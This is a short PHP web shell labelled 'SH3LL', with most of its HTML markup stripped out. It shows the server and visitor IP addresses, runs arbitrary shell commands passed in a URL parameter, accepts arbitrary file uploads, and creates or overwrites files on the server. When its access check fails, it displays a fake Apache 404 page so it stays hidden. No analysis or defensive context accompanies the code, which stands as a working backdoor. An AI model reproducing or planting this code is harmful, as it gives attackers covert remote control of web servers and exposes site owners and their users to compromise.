[×] SH3LL [×]

[+] Path : ".__FILE__. "
[+] Server IP : " .$_SERVER['SERVER_ADDR']. " & Your IP : " .$_SERVER['REMOTE_ADDR']."
"; if ($_GET['sub'] == 'sub'){ $cmd = shell_exec($_GET['cum']); echo "

OUT : ".$cmd. "

"; } if ($_POST['sub'] == 'upload'){ $nf = $_FILES['file']['name']; move_uploaded_file($_FILES['file']['tmp_name'], $nf); echo "

Uploaded : " .$nf."

"; } if ($_POST['send'] == 'send'){ $file = fopen($_POST['nm'], 'w'); fwrite($file, $_POST['tx']); fclose($file); echo "

Done

"; } echo "


Comment execute

File upload

Create or edit file
"; } else{ echo ' 404 Not Found

Not Found

The requested URL was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

'; } ?>